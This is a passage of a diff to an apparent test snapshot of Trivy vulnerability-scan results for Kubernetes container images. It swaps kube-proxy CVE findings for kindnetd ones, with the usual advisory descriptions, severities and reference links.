"https://www.cve.org/CVERecord?id=CVE-2019-1010024", ], }, "category": "Vulnerability", - "description": "The ElGamal implementation in Libgcrypt before 1.9.4 allows plaintext recovery because, during interaction between two cryptographic libraries, a certain dangerous combination of the prime defined by the receiver's public key, the generator defined by the receiver's public key, and the sender's ephemeral exponents can lead to a cross-configuration attack against OpenPGP.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass ASLR using cache of thread stack and heap. The component is: glibc. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "ElGamal implementation allows plaintext recovery", + "name": "glibc: ASLR bypass using cache of thread stack and heap", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-40528", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:5311", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010024", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-40528", + "value": "http://www.securityfocus.com/bid/109162", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2002816", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010024", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2002816", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40528", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010024", }, { "type": "URL", - "value": "https://dev.gnupg.org/rCb118681ebc4c9ea4b9da79b0f9541405a64f4c13", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", }, { "type": "URL", - "value": "https://eprint.iacr.org/2021/923", + "value": "https://support.f5.com/csp/article/K06046097", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2022-5311.html", + "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:5311", + "value": "https://ubuntu.com/security/CVE-2019-1010024", }, { "type": "URL", - "value": "https://git.gnupg.org/cgi-bin/gitweb.cgi?p=libgcrypt.git;a=commit;h=3462280f2e23e16adf3ed5176e0f2413d8861320", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010024", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-1010025", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc6", + "references": [ + "https://access.redhat.com/security/cve/CVE-2019-1010025", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", + "https://security-tracker.debian.org/tracker/CVE-2019-1010025", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", + "https://support.f5.com/csp/article/K06046097", + "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "https://ubuntu.com/security/CVE-2019-1010025", + "https://www.cve.org/CVERecord?id=CVE-2019-1010025", + ], + }, + "category": "Vulnerability", + "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may guess the heap addresses of pthread_created thread. The component is: glibc. NOTE: the vendor's position is "ASLR bypass itself is not a vulnerability."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "glibc: information disclosure of heap addresses of pthread_created thread", + "references": [ { "type": "URL", - "value": "https://ibm.github.io/system-security-research-updates/2021/07/20/insecurity-elgamal-pt1", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010025", }, { "type": "URL", - "value": "https://ibm.github.io/system-security-research-updates/2021/09/06/insecurity-elgamal-pt2", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010025", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-40528.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9564.html", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010025", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-40528", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-13", + "value": "https://support.f5.com/csp/article/K06046097", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5080-1", + "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5080-2", + "value": "https://ubuntu.com/security/CVE-2019-1010025", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-40528", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010025", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-6829", - "installedVersion": "1.8.4-5", - "packageName": "libgcrypt20", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-9192", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc6", "references": [ - "https://access.redhat.com/security/cve/CVE-2018-6829", - "https://github.com/weikengchen/attack-on-libgcrypt-elgamal", - "https://github.com/weikengchen/attack-on-libgcrypt-elgamal/wiki", - "https://lists.gnupg.org/pipermail/gcrypt-devel/2018-February/004394.html", - "https://nvd.nist.gov/vuln/detail/CVE-2018-6829", - "https://www.cve.org/CVERecord?id=CVE-2018-6829", - "https://www.oracle.com/security-alerts/cpujan2020.html", + "https://access.redhat.com/security/cve/CVE-2019-9192", + "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", + "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", + "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "https://www.cve.org/CVERecord?id=CVE-2019-9192", ], }, "category": "Vulnerability", - "description": "cipher/elgamal.c in Libgcrypt through 1.8.2, when used to encrypt messages directly, improperly encodes plaintexts, which allows attackers to obtain sensitive information by reading ciphertext data (i.e., it does not have semantic security in face of a ciphertext-only attack). The Decisional Diffie-Hellman (DDH) assumption does not hold for Libgcrypt's ElGamal implementation.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "** DISPUTED ** In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(|)(\\\\1\\\\1)*' in grep, a different issue than CVE-2018-20796. NOTE: the software maintainer disputes that this is a vulnerability because the behavior occurs only with a crafted pattern.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "libgcrypt: ElGamal implementation doesn't have semantic security due to incorrectly encoded plaintexts possibly allowing to obtain sensitive information", + "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-6829", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-6829", - }, - { - "type": "URL", - "value": "https://github.com/weikengchen/attack-on-libgcrypt-elgamal", + "value": "https://avd.aquasec.com/nvd/cve-2019-9192", }, { "type": "URL", - "value": "https://github.com/weikengchen/attack-on-libgcrypt-elgamal/wiki", + "value": "https://access.redhat.com/security/cve/CVE-2019-9192", }, { "type": "URL", - "value": "https://lists.gnupg.org/pipermail/gcrypt-devel/2018-February/004394.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-6829", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-6829", + "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujan2020.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-9192", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": "2:6.1.2+dfsg-4+deb10u1", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-43618", - "installedVersion": "2:6.1.2+dfsg-4", - "packageName": "libgmp10", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-1304", + "installedVersion": "1.46.2-2", + "packageName": "libcom-err2", "references": [ - "http://seclists.org/fulldisclosure/2022/Oct/8", - "http://www.openwall.com/lists/oss-security/2022/10/13/3", - "https://access.redhat.com/security/cve/CVE-2021-43618", - "https://bugs.debian.org/994405", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43618", - "https://gmplib.org/list-archives/gmp-bugs/2021-September/005077.html", - "https://gmplib.org/repo/gmp-6.2/rev/561a9c25298e", - "https://lists.debian.org/debian-lts-announce/2021/12/msg00001.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-43618", - "https://security.netapp.com/advisory/ntap-20221111-0001/", - "https://ubuntu.com/security/notices/USN-5672-1", - "https://ubuntu.com/security/notices/USN-5672-2", - "https://www.cve.org/CVERecord?id=CVE-2021-43618", + "https://access.redhat.com/errata/RHSA-2022:8361", + "https://access.redhat.com/security/cve/CVE-2022-1304", + "https://bugzilla.redhat.com/2069726", + "https://bugzilla.redhat.com/show_bug.cgi?id=2069726", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1304", + "https://errata.almalinux.org/9/ALSA-2022-8361.html", + "https://errata.rockylinux.org/RLSA-2022:8361", + "https://linux.oracle.com/cve/CVE-2022-1304.html", + "https://linux.oracle.com/errata/ELSA-2022-8361.html", + "https://marc.info/?l=linux-ext4&m=165056234501732&w=2", + "https://nvd.nist.gov/vuln/detail/CVE-2022-1304", + "https://ubuntu.com/security/notices/USN-5464-1", + "https://www.cve.org/CVERecord?id=CVE-2022-1304", ], }, "category": "Vulnerability", - "description": "GNU Multiple Precision Arithmetic Library (GMP) through 6.2.1 has an mpz/inp_raw.c integer overflow and resultant buffer overflow via crafted input, leading to a segmentation fault on 32-bit platforms.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "An out-of-bounds read/write vulnerability was found in e2fsprogs 1.46.5. This issue leads to a segmentation fault and possibly arbitrary code execution via a specially crafted filesystem.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "Integer overflow and resultant buffer overflow via crafted input", + "name": "e2fsprogs: out-of-bounds read/write via crafted filesystem", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-43618", + "value": "https://avd.aquasec.com/nvd/cve-2022-1304", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/Oct/8", + "value": "https://access.redhat.com/errata/RHSA-2022:8361", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2022/10/13/3", + "value": "https://access.redhat.com/security/cve/CVE-2022-1304", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-43618", + "value": "https://bugzilla.redhat.com/2069726", }, { "type": "URL", - "value": "https://bugs.debian.org/994405", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2069726", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43618", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1304", }, { "type": "URL", - "value": "https://gmplib.org/list-archives/gmp-bugs/2021-September/005077.html", + "value": "https://errata.almalinux.org/9/ALSA-2022-8361.html", }, { "type": "URL", - "value": "https://gmplib.org/repo/gmp-6.2/rev/561a9c25298e", + "value": "https://errata.rockylinux.org/RLSA-2022:8361", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2021/12/msg00001.html", + "value": "https://linux.oracle.com/cve/CVE-2022-1304.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-43618", + "value": "https://linux.oracle.com/errata/ELSA-2022-8361.html", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20221111-0001/", + "value": "https://marc.info/?l=linux-ext4&m=165056234501732&w=2", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5672-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1304", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5672-2", + "value": "https://ubuntu.com/security/notices/USN-5464-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-43618", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-1304", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "3.6.7-4+deb10u7", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-20231", - "installedVersion": "3.6.7-4+deb10u6", - "packageName": "libgnutls30", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-8457", + "installedVersion": "5.3.28+dfsg1-0.8", + "packageName": "libdb5.3", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-20231", - "https://bugzilla.redhat.com/show_bug.cgi?id=1776250", - "https://bugzilla.redhat.com/show_bug.cgi?id=1908110", - "https://bugzilla.redhat.com/show_bug.cgi?id=1908334", - "https://bugzilla.redhat.com/show_bug.cgi?id=1922275", - "https://bugzilla.redhat.com/show_bug.cgi?id=1922276", - "https://bugzilla.redhat.com/show_bug.cgi?id=1965445", - "https://bugzilla.redhat.com/show_bug.cgi?id=1967983", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20231", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20232", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3580", - "https://errata.almalinux.org/8/ALSA-2021-4451.html", - "https://errata.rockylinux.org/RLSA-2021:4451", - "https://gitlab.com/gnutls/gnutls/-/issues/1151", - "https://linux.oracle.com/cve/CVE-2021-20231.html", - "https://linux.oracle.com/errata/ELSA-2022-9221.html", - "https://lists.apache.org/thread.html/r50661d6f0082709aad9a584431b59ec364f9974b63b07e0800230168@%3Cissues.spark.apache.org%3E", - "https://lists.apache.org/thread.html/r5d4001031e7790d8c6396c499522b4ed2aab782da87b1a14184793bb@%3Cissues.spark.apache.org%3E", - "https://lists.apache.org/thread.html/r5f88bed447742fcc5c47bf1c7be965ef450131914a6e1f85feba2779@%3Cissues.spark.apache.org%3E", - "https://lists.apache.org/thread.html/r6ac143ba6dd98bd4bf6bf010d46e56e254056459721ba18822d611f7@%3Cissues.spark.apache.org%3E", - "https://lists.apache.org/thread.html/r9cbc69e57276413788e90a6ee16c7c034ea4258d31935b70db2bd158@%3Cissues.spark.apache.org%3E", - "https://lists.apache.org/thread.html/rcd70a4c88a47a75fd2d5f3ffb7cee8c2a18c713320bd90fdcb57495f@%3Cissues.spark.apache.org%3E", - "https://lists.apache.org/thread.html/rf5e1256d870193def4a82ad89ab95e63943a313b5ff0d81aa87e4532@%3Cissues.spark.apache.org%3E", - "https://lists.apache.org/thread.html/rfd5273d72d244178441e6904a2f2b41a3268f569e8092ea0b3b2bb20@%3Cissues.spark.apache.org%3E", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OSLAE6PP33A7VYRYMYMUVB3U6B26GZER/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-20231", - "https://security.netapp.com/advisory/ntap-20210416-0005/", - "https://ubuntu.com/security/notices/USN-5029-1", - "https://www.cve.org/CVERecord?id=CVE-2021-20231", - "https://www.gnutls.org/security-new.html#GNUTLS-SA-2021-03-10", + "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00074.html", + "https://access.redhat.com/security/cve/CVE-2019-8457", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8457", + "https://kc.mcafee.com/corporate/index?page=content&id=SB10365", + "https://linux.oracle.com/cve/CVE-2019-8457.html", + "https://linux.oracle.com/errata/ELSA-2020-1810.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OPKYSWCOM3CL66RI76TYVIG6TJ263RXH/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SJPFGA45DI4F5MCF2OAACGH3HQOF4G3M/", + "https://nvd.nist.gov/vuln/detail/CVE-2019-8457", + "https://security.netapp.com/advisory/ntap-20190606-0002/", + "https://ubuntu.com/security/notices/USN-4004-1", + "https://ubuntu.com/security/notices/USN-4004-2", + "https://ubuntu.com/security/notices/USN-4019-1", + "https://ubuntu.com/security/notices/USN-4019-2", + "https://usn.ubuntu.com/4004-1/", + "https://usn.ubuntu.com/4004-2/", + "https://usn.ubuntu.com/4019-1/", + "https://usn.ubuntu.com/4019-2/", + "https://www.cve.org/CVERecord?id=CVE-2019-8457", + "https://www.oracle.com/security-alerts/cpuapr2020.html", + "https://www.oracle.com/security-alerts/cpujan2020.html", + "https://www.oracle.com/security-alerts/cpujul2020.html", + "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", + "https://www.sqlite.org/releaselog/3_28_0.html", + "https://www.sqlite.org/src/info/90acdbfce9c08858", ], }, "category": "Vulnerability", - "description": "A flaw was found in gnutls. A use after free issue in client sending key_share extension may lead to memory corruption and other consequences.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "SQLite3 from 3.6.0 to and including 3.27.2 is vulnerable to heap out-of-bound read in the rtreenode() function when handling invalid rtree tables.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "gnutls: Use after free in client key_share extension", + "name": "sqlite: heap out-of-bound read in function rtreenode()", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-20231", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-20231", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1776250", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1908110", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1908334", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1922275", + "value": "https://avd.aquasec.com/nvd/cve-2019-8457", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1922276", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00074.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1965445", + "value": "https://access.redhat.com/security/cve/CVE-2019-8457", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1967983", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8457", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20231", + "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10365", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20232", + "value": "https://linux.oracle.com/cve/CVE-2019-8457.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3580", + "value": "https://linux.oracle.com/errata/ELSA-2020-1810.html", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-4451.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OPKYSWCOM3CL66RI76TYVIG6TJ263RXH/", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2021:4451", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SJPFGA45DI4F5MCF2OAACGH3HQOF4G3M/", }, { "type": "URL", - "value": "https://gitlab.com/gnutls/gnutls/-/issues/1151", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-8457", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-20231.html", + "value": "https://security.netapp.com/advisory/ntap-20190606-0002/", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9221.html", + "value": "https://ubuntu.com/security/notices/USN-4004-1", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r50661d6f0082709aad9a584431b59ec364f9974b63b07e0800230168@%3Cissues.spark.apache.org%3E", + "value": "https://ubuntu.com/security/notices/USN-4004-2", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r5d4001031e7790d8c6396c499522b4ed2aab782da87b1a14184793bb@%3Cissues.spark.apache.org%3E", + "value": "https://ubuntu.com/security/notices/USN-4019-1", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r5f88bed447742fcc5c47bf1c7be965ef450131914a6e1f85feba2779@%3Cissues.spark.apache.org%3E", + "value": "https://ubuntu.com/security/notices/USN-4019-2", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r6ac143ba6dd98bd4bf6bf010d46e56e254056459721ba18822d611f7@%3Cissues.spark.apache.org%3E", + "value": "https://usn.ubuntu.com/4004-1/", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r9cbc69e57276413788e90a6ee16c7c034ea4258d31935b70db2bd158@%3Cissues.spark.apache.org%3E", + "value": "https://usn.ubuntu.com/4004-2/", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rcd70a4c88a47a75fd2d5f3ffb7cee8c2a18c713320bd90fdcb57495f@%3Cissues.spark.apache.org%3E", + "value": "https://usn.ubuntu.com/4019-1/", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf5e1256d870193def4a82ad89ab95e63943a313b5ff0d81aa87e4532@%3Cissues.spark.apache.org%3E", + "value": "https://usn.ubuntu.com/4019-2/", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rfd5273d72d244178441e6904a2f2b41a3268f569e8092ea0b3b2bb20@%3Cissues.spark.apache.org%3E", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-8457", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OSLAE6PP33A7VYRYMYMUVB3U6B26GZER/", + "value": "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-20231", + "value": "https://www.oracle.com/security-alerts/cpujan2020.html", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210416-0005/", + "value": "https://www.oracle.com/security-alerts/cpujul2020.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5029-1", + "value": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-20231", + "value": "https://www.sqlite.org/releaselog/3_28_0.html", }, { "type": "URL", - "value": "https://www.gnutls.org/security-new.html#GNUTLS-SA-2021-03-10", + "value": "https://www.sqlite.org/src/info/90acdbfce9c08858", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "3.6.7-4+deb10u7", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-20232", - "installedVersion": "3.6.7-4+deb10u6", - "packageName": "libgnutls30", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-33560", + "installedVersion": "1.8.7-6", + "packageName": "libgcrypt20", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-20232", - "https://bugzilla.redhat.com/show_bug.cgi?id=1776250", - "https://bugzilla.redhat.com/show_bug.cgi?id=1908110", - "https://bugzilla.redhat.com/show_bug.cgi?id=1908334", - "https://bugzilla.redhat.com/show_bug.cgi?id=1922275", - "https://bugzilla.redhat.com/show_bug.cgi?id=1922276", - "https://bugzilla.redhat.com/show_bug.cgi?id=1965445", - "https://bugzilla.redhat.com/show_bug.cgi?id=1967983", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20231", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20232", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3580", - "https://errata.almalinux.org/8/ALSA-2021-4451.html", - "https://errata.rockylinux.org/RLSA-2021:4451", - "https://gitlab.com/gnutls/gnutls/-/issues/1151", - "https://linux.oracle.com/cve/CVE-2021-20232.html", - "https://linux.oracle.com/errata/ELSA-2022-9221.html", - "https://lists.apache.org/thread.html/r50661d6f0082709aad9a584431b59ec364f9974b63b07e0800230168@%3Cissues.spark.apache.org%3E", - "https://lists.apache.org/thread.html/r5d4001031e7790d8c6396c499522b4ed2aab782da87b1a14184793bb@%3Cissues.spark.apache.org%3E", - "https://lists.apache.org/thread.html/r5f88bed447742fcc5c47bf1c7be965ef450131914a6e1f85feba2779@%3Cissues.spark.apache.org%3E", - "https://lists.apache.org/thread.html/r6ac143ba6dd98bd4bf6bf010d46e56e254056459721ba18822d611f7@%3Cissues.spark.apache.org%3E", - "https://lists.apache.org/thread.html/r9cbc69e57276413788e90a6ee16c7c034ea4258d31935b70db2bd158@%3Cissues.spark.apache.org%3E", - "https://lists.apache.org/thread.html/rcd70a4c88a47a75fd2d5f3ffb7cee8c2a18c713320bd90fdcb57495f@%3Cissues.spark.apache.org%3E", - "https://lists.apache.org/thread.html/rf5e1256d870193def4a82ad89ab95e63943a313b5ff0d81aa87e4532@%3Cissues.spark.apache.org%3E", - "https://lists.apache.org/thread.html/rfd5273d72d244178441e6904a2f2b41a3268f569e8092ea0b3b2bb20@%3Cissues.spark.apache.org%3E", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OSLAE6PP33A7VYRYMYMUVB3U6B26GZER/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-20232", - "https://security.netapp.com/advisory/ntap-20210416-0005/", - "https://ubuntu.com/security/notices/USN-5029-1", - "https://www.cve.org/CVERecord?id=CVE-2021-20232", - "https://www.gnutls.org/security-new.html#GNUTLS-SA-2021-03-10", + "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-33560.json", + "https://access.redhat.com/security/cve/CVE-2021-33560", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33560", + "https://dev.gnupg.org/T5305", + "https://dev.gnupg.org/T5328", + "https://dev.gnupg.org/T5466", + "https://dev.gnupg.org/rCe8b7f10be275bcedb5fc05ed4837a89bfd605c61", + "https://eprint.iacr.org/2021/923", + "https://errata.almalinux.org/8/ALSA-2021-4409.html", + "https://linux.oracle.com/cve/CVE-2021-33560.html", + "https://linux.oracle.com/errata/ELSA-2022-9263.html", + "https://lists.debian.org/debian-lts-announce/2021/06/msg00021.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BKKTOIGFW2SGN3DO2UHHVZ7MJSYN4AAB/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R7OAPCUGPF3VLA7QAJUQSL255D4ITVTL/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-33560", + "https://security.gentoo.org/glsa/202210-13", + "https://ubuntu.com/security/notices/USN-5080-1", + "https://ubuntu.com/security/notices/USN-5080-2", + "https://www.cve.org/CVERecord?id=CVE-2021-33560", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpujan2022.html", + "https://www.oracle.com/security-alerts/cpujul2022.html", + "https://www.oracle.com/security-alerts/cpuoct2021.html", ], }, "category": "Vulnerability", - "description": "A flaw was found in gnutls. A use after free issue in client_send_params in lib/ext/pre_shared_key.c may lead to memory corruption and other potential consequences.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "Libgcrypt before 1.8.8 and 1.9.x before 1.9.3 mishandles ElGamal encryption because it lacks exponent blinding to address a side-channel attack against mpi_powm, and the window size is not chosen appropriately. This, for example, affects use of ElGamal in OpenPGP.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "gnutls: Use after free in client_send_params in lib/ext/pre_shared_key.c", + "name": "libgcrypt: mishandles ElGamal encryption because it lacks exponent blinding to address a side-channel attack against mpi_powm", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-20232", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-20232", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1776250", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1908110", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1908334", - }, - { - "type": "URL", - "value": 